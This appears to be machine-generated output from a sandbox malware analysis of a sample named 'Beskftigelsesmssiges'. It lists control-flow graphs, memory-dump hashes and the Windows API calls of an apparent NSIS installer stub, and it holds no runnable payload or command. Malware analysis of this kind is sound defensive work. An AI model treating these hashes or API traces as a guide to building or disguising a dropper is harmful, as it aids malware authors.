1565cf-1565d2 1675->1687 1684 1565f1-1565ff 1676->1684 1677->1615 1680 15664b 1677->1680 1678->1615 1681 156658-15665b 1678->1681 1679->1652 1680->1678 1681->1616 1681->1617 1684->1652 1687->1615 1688 1565d8-1565ea 1687->1688 1688->1684
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: ,bq$,bq
                                                                                                                                                                                    • API String ID: 0-2699258169
                                                                                                                                                                                    • Opcode ID: 3e4461cd96fcf58641edc95e64bb06958d98c2a355e16274d363d92f51fbac66
                                                                                                                                                                                    • Instruction ID: 26956df57074d2a93828fda158396c028dd159a16c04a0132e0bd9fd44b3c063
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4461cd96fcf58641edc95e64bb06958d98c2a355e16274d363d92f51fbac66
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B819F34A00505CFCB18CF69C484969BBB2BF89312BA58169D825DF365DB31EC49CFE1

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1690 159d59-159d6b call 159620 1693 159d6d-159d77 1690->1693 1694 159d79-159d82 call 159620 1690->1694 1693->1694 1698 159d84-159d8e 1694->1698 1699 159d90-159d99 1694->1699 1698->1699 1700 159da4-159dcd 1699->1700
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                                                                                    • API String ID: 0-2697143702
                                                                                                                                                                                    • Opcode ID: 5a99af383d1331300b5914606719756013095e5e961ec1c4facf0a44a309335a
                                                                                                                                                                                    • Instruction ID: cc4cf7f2e33e3201a2e3c01c9d31b0a1acb0d86b50e578e702eef230c317b673
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a99af383d1331300b5914606719756013095e5e961ec1c4facf0a44a309335a
                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF06835340118AFDB081BA6985497FBBDBEBCC361B144429BD0ACB351DF71CC4683A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: LR^q
                                                                                                                                                                                    • API String ID: 0-2625958711
                                                                                                                                                                                    • Opcode ID: 5e86f0d610eee9e2d9b53e51219c023f76e8088c7430d5f15d7bd40328eb925c
                                                                                                                                                                                    • Instruction ID: f80a9d12b283e7e7e866291efeb5c9800d0bee3d13a720e7de73610d631addce
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e86f0d610eee9e2d9b53e51219c023f76e8088c7430d5f15d7bd40328eb925c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C52E674A40619CFCB58DF68DDA4A9DBBB2FF49301F1081A9E409A7365DB346E85CF80
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                    • API String ID: 0-2730988801
                                                                                                                                                                                    • Opcode ID: 09bae67d315ac11ed6892c80060f8b9f742a1c3bd68083042ee87b3c6af0a25d
                                                                                                                                                                                    • Instruction ID: 1a2c623315c04cabf7fa550817da42501c2a8a327812b7b0e07dacb5c738765b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09bae67d315ac11ed6892c80060f8b9f742a1c3bd68083042ee87b3c6af0a25d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88316B74D093498FCB05DFB8D8046EDBFB5EF4A304F0441AAD844EB261EB345A88CBA1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d29e1d98747d08c4ed73d782c0919dd6e0ba5697bef9a65f9b762e3d46260e65
                                                                                                                                                                                    • Instruction ID: ea02b98002d68c6ab6d8f0a160143ea9446c228af5230543b19cfc05af806907
                                                                                                                                                                                    • Opcode Fuzzy Hash: d29e1d98747d08c4ed73d782c0919dd6e0ba5697bef9a65f9b762e3d46260e65
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8129835065646CFA2502B70EDAC12BBBF1FB1F32B7546CA8F10FC58659B3144C9CA62
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 9843de0b933b134418c39653e72e80aef2edcc7c5c82c5dae780437532fecdf3
                                                                                                                                                                                    • Instruction ID: b4d83d810602c1a9f5be730e030f4924e4502b10a8247b2dbd1b2b1afca76ebb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9843de0b933b134418c39653e72e80aef2edcc7c5c82c5dae780437532fecdf3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2171F534700A05CFCB15DF68C884A6A7BE6AF99742F1540A9E826EF371DB70DC86CB51
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f4607329d8c0231808a0db31a69eaacce8b70bd6c2c7bb4f9c82bd66e8d7bf43
                                                                                                                                                                                    • Instruction ID: fba75b7ba8a9408325bc8b413c1daddafd45bd37c3a6149b7fb89b6b5898b601
                                                                                                                                                                                    • Opcode Fuzzy Hash: f4607329d8c0231808a0db31a69eaacce8b70bd6c2c7bb4f9c82bd66e8d7bf43
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1261F334D01319DFDB15CFA5C954BAEBBB2BF88304F208529D809AB3A4DB75598ACF41
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 76925b9e922f5dce92d570df70b7e29eddf2a569d91f52ce7293f97e8813a576
                                                                                                                                                                                    • Instruction ID: 402e23e66cbadac2853464377b2bc238822b381fe18de536ef117e2c62a121b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 76925b9e922f5dce92d570df70b7e29eddf2a569d91f52ce7293f97e8813a576
                                                                                                                                                                                    • Instruction Fuzzy Hash: F9519174E01208DFDB48DFA9D9849DDBBF2BF89300F209169E819AB365DB31A905CF10
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 219dc68df1e813b75e91c07f65fa5e8ddc9caf8a4f9d75641132bd2e2111e99b
                                                                                                                                                                                    • Instruction ID: 239b1cb4a5d638a737596858f4438d79e718406ef8709feef5214aaa405fac35
                                                                                                                                                                                    • Opcode Fuzzy Hash: 219dc68df1e813b75e91c07f65fa5e8ddc9caf8a4f9d75641132bd2e2111e99b
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB415C30600245CFDB01CF68C844B6A7BB6EF89312F558466ED28CF265E775DC45CBA2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1ef6d1ff8514b1e34b3705ce61f5512d518ea6bf285c56c764349f8b0b371b69
                                                                                                                                                                                    • Instruction ID: 00a79523f0690cd753306f8aa5cd72636cd23b28570479dcf2e2df23b8f387b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ef6d1ff8514b1e34b3705ce61f5512d518ea6bf285c56c764349f8b0b371b69
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3431A131204149DFCF059F64D9A4AAE3BB3EF88301F508024FD299B255CB39DEA5DBA0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 60199cfc7f018cf4c12d1e94b1ad540af3ddad246e20a85a2a6d61898d05a087
                                                                                                                                                                                    • Instruction ID: c07c7e8c1d3af724341cfa30cfc9a4ef3e65eb9c51a4fafc7c05d9c7da7b4e76
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60199cfc7f018cf4c12d1e94b1ad540af3ddad246e20a85a2a6d61898d05a087
                                                                                                                                                                                    • Instruction Fuzzy Hash: D1419275E01208CFCB48DFAAD99099DBBF2BF89301F209029E815BB324DB34A945CF54
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f65ff8a6a6ada88a81e9810c738bc7200e65bdb8b7b0539f8224a700bb8e6781
                                                                                                                                                                                    • Instruction ID: c6e44534945b85271030a7bcd3581585bd34938bcd45a542cfa26c1502c1fb6b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f65ff8a6a6ada88a81e9810c738bc7200e65bdb8b7b0539f8224a700bb8e6781
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B217131300206CBDB145629C854B7F6697AFC475AF248039DC16DF7A4EF65CC8B9391
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d04de86d73a2b349c84bcb65ec6de7a3da54d30d6ce61ecd8c9a861501e63000
                                                                                                                                                                                    • Instruction ID: e0b3e2b29feacfe2f06f3a4a727694abc948a9680dadfe6be5309f4c73af0482
                                                                                                                                                                                    • Opcode Fuzzy Hash: d04de86d73a2b349c84bcb65ec6de7a3da54d30d6ce61ecd8c9a861501e63000
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86218E76A001159FCB18DF24C4909AE77A5EF9A368F208059D85A9B340DB34EE06CBD2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939994983.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_9d000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8e8bcc104757df970fb15f2bc66d01c4de277daa153a682d830bce02da0edeac
                                                                                                                                                                                    • Instruction ID: 60d16c130a94acb0d227916c3c0a57bb57e090369012bd88bc0aadc796cab4b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e8bcc104757df970fb15f2bc66d01c4de277daa153a682d830bce02da0edeac
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F214871544200DFCF10DF14D9C0B2ABFA1FB98314F20C56AD9090B256C336D856EBA1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 43998aaa9c7cd7fa2c72a67e9cf94c355de7beeb758c3a778c1b47ed25ecae26
                                                                                                                                                                                    • Instruction ID: 2f40e07e508694ea61dcde90e50fce298075e4461f9f7e399f77e1af5193ed61
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43998aaa9c7cd7fa2c72a67e9cf94c355de7beeb758c3a778c1b47ed25ecae26
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A21DE35300611CFC7199B2AC898A2EB3A2FF897567558028E81ECF7A4CF34DC468BD0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 012b196893b234e35007269abe9765ddd27ee9447c8239506bdc2ae8718a64fd
                                                                                                                                                                                    • Instruction ID: f1eed2ee023d62c0c417cfebce53476e80af3b549788dc2d140c16881603e0ca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 012b196893b234e35007269abe9765ddd27ee9447c8239506bdc2ae8718a64fd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65214B34E00249DFCB05CFA5D550AEDBFB6AF49306F248069E815AB2A0DB349985DF60
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2939994983.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_9d000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e30d8c23d169001941ea9aa459473fa7ec8b4af4ddb27b59cb516a26a12e2698
                                                                                                                                                                                    • Instruction ID: 28b3f5ef59fdc6155d1cf3ec30333247b97edc4fe69eaae99f9bbaa3c5a3dc0f
                                                                                                                                                                                    • Opcode Fuzzy Hash: e30d8c23d169001941ea9aa459473fa7ec8b4af4ddb27b59cb516a26a12e2698
                                                                                                                                                                                    • Instruction Fuzzy Hash: 24110376544280CFCF02CF14D5C4B16BFB1FB94314F24C5AAD8090B616C336D85ADBA2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f3286d55ed082e247a0385a4a8975d3896b90a1099da7250919a57a55bf16a61
                                                                                                                                                                                    • Instruction ID: 31a4330141b292173f73d33267ffbd7996d7829137bf975099112fd370afdc42
                                                                                                                                                                                    • Opcode Fuzzy Hash: f3286d55ed082e247a0385a4a8975d3896b90a1099da7250919a57a55bf16a61
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C113AB0D001099FDB08EFA9C990A9EBBF2FF84300F10D5B9D0189B365EB745A499B80
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
                                                                                                                                                                                    • Instruction ID: aa864a3ae522808f2c87094be09c5eed03dc4ba5139dbb19e23f810937a4a8ad
                                                                                                                                                                                    • Opcode Fuzzy Hash: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69016832704204AFCB068F649C217AE3BB7DFC9350B148066FD18DB290DB318E069B90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7d381b8737fcec6e56d33a4cb5fa0d78bbbfa1d89b67634fc5c66cd83d92186b
                                                                                                                                                                                    • Instruction ID: e8eec27eb783108ba1a69916aa5f3e431758dbf78aa57052e68bc675dcdb3f70
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d381b8737fcec6e56d33a4cb5fa0d78bbbfa1d89b67634fc5c66cd83d92186b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51112D74E0434AEFDB05CFA8D8545AEBBB1FF8A300F014065E914A7361D7385A56DF91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ee74f0420ce71467ef64ff3a9eed5d1f247da96ddb048dea38afde9955650184
                                                                                                                                                                                    • Instruction ID: a318f8951600b7d4ac9b7d6a4190b319be9bda0dec96d9e37d45181188a91868
                                                                                                                                                                                    • Opcode Fuzzy Hash: ee74f0420ce71467ef64ff3a9eed5d1f247da96ddb048dea38afde9955650184
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9F0FC313802108B87155A2EE85462A76EEEFC8B56395417AEC1DCF361DF21CC478381
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                                                                                                                    • Instruction ID: 0c3463949ee1ae525ac12f5af34df97a838c65e52c2bb33d2cf00fd7680a4862
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0601D176608244DFCB159F64DC80B88BF71BF8A324F580296E9209B2E2C7308C14CB10
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 67a648ecc08d9dc1abfd8c76a2d5ef12deaba489b358ef7c57a2645cbd0d2cb3
                                                                                                                                                                                    • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 67a648ecc08d9dc1abfd8c76a2d5ef12deaba489b358ef7c57a2645cbd0d2cb3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 9ba6013c36aecad39baa9faf301f12cdf34a2104e0780caba59ef254caa8b033
                                                                                                                                                                                    • Instruction ID: ef515a75c57c8443f7febd5c07b51322c1fb63ef6d2a9b30ff341a570c71d440
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ba6013c36aecad39baa9faf301f12cdf34a2104e0780caba59ef254caa8b033
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D04235E44109CBCB20DFA8E9844DCBB71EF99322B60506AD929A3661D63054958F11
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8344d0f22ea95b758639842ab861e71afb564fc66cce71ff372889ffd9be7b94
                                                                                                                                                                                    • Instruction ID: 65f01592ad16524979a927e5d0d7e0b22e9500cce45adc26fa45df1091e7e335
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8344d0f22ea95b758639842ab861e71afb564fc66cce71ff372889ffd9be7b94
                                                                                                                                                                                    • Instruction Fuzzy Hash: 13C0123008430C4EC505F775DD55555B73EAB803047808520E00D0767EDFB85DC94FD0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNEL32 ref: 00403555
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                                                                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                                                                                                                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403670
                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                                                                                                                                                                    • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000400,00441800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(00441800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                                                                                                                                                                    • lstrcatW.KERNEL32(00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                                                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                                                                                                                    • lstrcatW.KERNEL32(00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00441800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00441000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                                                                                                                    • lstrlenW.KERNEL32(00441800,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                    • wsprintfW.USER32 ref: 004039B1
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00437800,00441800), ref: 004039E4
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 00403A1E
